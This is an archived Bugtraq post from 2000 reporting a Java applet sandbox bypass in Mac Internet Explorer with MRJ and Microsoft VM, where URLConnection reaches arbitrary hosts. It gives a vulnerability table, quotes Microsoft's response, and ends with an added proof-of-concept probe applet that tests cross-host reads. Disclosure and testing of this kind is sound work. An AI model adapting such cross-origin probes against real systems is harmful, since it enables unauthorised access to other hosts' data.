Bugtraq mailing list archives

Re: Reappearance of an old IE security bug


From: takagi () ETL GO JP (TAKAGI, Hiromitsu)
Date: Sat, 13 May 2000 08:38:06 +0900


On Sun, 16 Apr 2000 17:09:04 -0600
Ben Mesander <bam () DIMENSIONAL COM> wrote:
> I have found a way to have a Java applet open a connection to an arbitrary
> host and violate the Java security model in Internet Explorer 5. This is a
> bug I first discovered in 1997, and Microsoft fixed it then. It seems to
> have reappeared in the latest IE 5.
> http://www.hungry.com/~ben/msie_bug/

I have confirmed this on the following combinations:
    Mac OS + MRJ 2.2 + IE 5
    Mac OS + Microsoft VM + IE 4.5
and that the following are not vulnerable:
    Mac OS + MRJ 2.1.4 + IE 5
    Mac OS + MRJ 2.1.4 + IE 4.5
    Mac OS + MRJ 2.2 + IE 4.5

You mentioned that it is a getImage bug. But I suspected that it might
be a java.net.URLConnection bug because getImage seems to be implemented
with URLConnection. I confirmed this with the following applet.
http://java-house.etl.go.jp/~takagi/java/test/urlconnection-http-redirect/Test.html
The results are as follows.
 Vulnerable:
    Mac OS + MRJ 2.2 + IE 5
    Mac OS + Microsoft VM + IE 4.5
    Mac OS + MRJ 2.1.4 + IE 5
    Mac OS + MRJ 2.1.4 + IE 4.5
 Not vulnerable:
    Mac OS + MRJ 2.2 + IE 4.5
(I don't understand why URLConnection is more widely vulnerable than
getImage.)

The problem has become very serious because URLConnection can access any
type of data, not only images.

In addition to the above, I accidentally found that URLConnection is still
vulnerable without the HTTP-redirection technique.
http://java-house.etl.go.jp/~takagi/java/test/urlconnection-direct/Test.html
 Vulnerable:
    Mac OS + MRJ 2.2 + IE 5
    Mac OS + MRJ 2.1.4 + IE 5
    Mac OS + MRJ 2.1.4 + IE 4.5
 Not vulnerable:
    Mac OS + Microsoft VM + IE 4.5
    Mac OS + MRJ 2.2 + IE 4.5
This simple bug seems to be the root of the problem in MRJ (except for the
Microsoft VM).

I asked the members of "Java House" (a Japanese-language mailing list for
discussion about Java, over which I preside) to confirm these vulnerabilities
in various combinations of MRJ versions and Java-enabled browsers. The
following table summarizes the investigation.

(1) http://neurosis.hungry.com/~ben/msie_bug/
(2) http://java-house.etl.go.jp/~takagi/java/test/urlconnection-http-redirect/Test.html
(3) http://java-house.etl.go.jp/~takagi/java/test/urlconnection-direct/Test.html
                                         (1)   (2)   (3)
MacOS + MRJ 2.2 + IE 5                    V     V     V
MacOS + MRJ 2.2 + IE 4.5                  NV    NV    NV
MacOS + MRJ 2.2 + IE 4.01                 NV    NV    NV
MacOS + MRJ 2.2 + iCab pre2.0             NV    NV    NV
MacOS + MRJ 2.2 + HotJava 3.0             NV    NV    NV
MacOS + MRJ 2.2 + Apple Applet Runner     NV    NV    NV
MacOS + MRJ 2.1.4 + IE 5                  NV    V     V
MacOS + MRJ 2.1.4 + IE 4.5                NV    V     V
MacOS + MRJ 2.1.4 + iCab pre2.0           NV    V     V
MacOS + MRJ 2.1.4 + HotJava 3.0           NV    NV    NV
MacOS + MRJ 2.1.4 + Apple Applet Runner   NV    V     V
MacOS + MRJ 2.1.1 + IE 5                  NV    V     V
MacOS + MRJ 2.1.1 + IE 4.5                NV    V     V
MacOS + MRJ 2.1.1 + IE 4.01               NV    V     V
MacOS + MRJ 2.1.1 + iCab pre2.0           NV    V     V
MacOS + MRJ 2.1.1 + HotJava 3.0           NV    NV    NV
MacOS + MRJ 2.1.1 + Apple Applet Runner   NV    V     V
MacOS + MRJ 2.0 + IE 4.5                  NV    V     V
MacOS + MRJ 2.0 + Apple Applet Runner     NV    V     V
MacOS + Microsoft VM for Java + IE 4.5    V     V     NV
MacOS + Microsoft VM for Java + IE 4.01   V     V     NV
(V: Vulnerable, NV: Not vulnerable)

I submitted this result to Microsoft and Apple Computer last week.

The response from Microsoft Security Response Center was:
| > > I've checked with the IE team, but it turns out that we no longer
| > > support Mac IE; instead, we have collaborated with Apple on their Java
| > > runtime and recommend that customers use it instead of Mac IE.
| > > There's some information on this available at
| > > http://www.microsoft.com/MAC/IE/Newsroom/IE45Press/2.asp, but I've also
| > > asked our product support folks to put together a Knowledge Base article
| > > that makes the recommendation explicit.  Regards,
| >
| > Does it mean that you will not announce it at the Security Bulletin?
|
| Yes, that is correct.  While there won't be a bulletin, the knowledge
| base article will be available for anyone that is concerned with this
| subject.

I worry that people who don't know about the existence of this problem
will not be able to find their knowledge base article.

Apple Computer does not seem to have a response center dedicated to
security issues, so I contacted an MRJ engineer and reported it.
He said that the problems have been submitted to their internal bug
database.

Regards,

--
Hiromitsu Takagi
http://www.etl.go.jp/~takagi/
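The two URLConnection tests in the table above, (2) http-redirect and (3) direct, can be reproduced with a small probe applet. The code below is an added example written for this archive page; it is not Takagi's Test.html applet and not Mesander's msie_bug page, and all hostnames and paths in it are hypothetical. It assumes the applet is served from http://applet-host.example/, that http://other-host.example/marker.txt is a different host whose response body begins with a known marker string, and that http://applet-host.example/redirect answers 302 with a Location header pointing at that marker URL. A correctly sandboxed VM must throw SecurityException before any byte of cross-host data reaches the applet; a VM that hands back the marker is vulnerable in the sense the table uses.

```java
import java.applet.Applet;
import java.awt.Graphics;
import java.io.IOException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;

/*
 * Hypothetical sandbox probe modelled on tests (2) and (3) in the thread.
 * This is example code for the archive page, not the original test applets.
 *
 * Deployment assumptions (all hypothetical):
 *   - the applet's codebase is http://applet-host.example/
 *   - http://other-host.example/marker.txt is a DIFFERENT host whose body
 *     starts with the string MARKER
 *   - http://applet-host.example/redirect is a same-origin URL that answers
 *     "302 Found" with Location: http://other-host.example/marker.txt
 */
public class URLConnectionProbe extends Applet {
    static final String MARKER = "CROSS-HOST-MARKER";
    static final String DIRECT_URL = "http://other-host.example/marker.txt";
    static final String REDIRECT_PATH = "redirect";

    String directResult = "not run";
    String redirectResult = "not run";

    public void init() {
        try {
            // (3) direct: open a connection straight to a host other than the codebase host
            directResult = probe(new URL(DIRECT_URL));
            // (2) http-redirect: connect to our own host and let the VM follow the 302
            redirectResult = probe(new URL(getCodeBase(), REDIRECT_PATH));
        } catch (MalformedURLException e) {
            directResult = redirectResult = "bad URL: " + e.getMessage();
        }
    }

    /*
     * Classifies one URL the way the table does:
     *   "V"  the applet actually read the other host's marker (sandbox violated)
     *   "NV" the VM threw SecurityException before any data came back
     *   anything else is inconclusive (network error, or the redirect was
     *   silently dropped and some other body came back)
     */
    static String probe(URL url) {
        try {
            URLConnection conn = url.openConnection();
            InputStream in = conn.getInputStream();
            String head = readPrefix(in, MARKER.length());
            in.close();
            if (MARKER.equals(head)) {
                return "V (read cross-host data via " + url + ")";
            }
            return "inconclusive (no marker in response from " + url + ")";
        } catch (SecurityException e) {
            return "NV (SecurityException: " + e.getMessage() + ")";
        } catch (IOException e) {
            return "inconclusive (IOException: " + e.getMessage() + ")";
        }
    }

    /* Reads up to n bytes from the stream and returns them as a Latin-1 string. */
    static String readPrefix(InputStream in, int n) throws IOException {
        byte[] buf = new byte[n];
        int total = 0;
        while (total < n) {
            int got = in.read(buf, total, n - total);
            if (got < 0) break;
            total += got;
        }
        return new String(buf, 0, total, "ISO-8859-1");
    }

    public void paint(Graphics g) {
        g.drawString("direct (3):   " + directResult, 10, 20);
        g.drawString("redirect (2): " + redirectResult, 10, 40);
    }
}
```

The marker check matters for the redirect case: a VM that refuses to follow the 302 and returns the same-origin response instead is not vulnerable, but it also does not throw, so checking only for the absence of SecurityException would misreport it. Only a body that provably came from the other host counts as "V".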


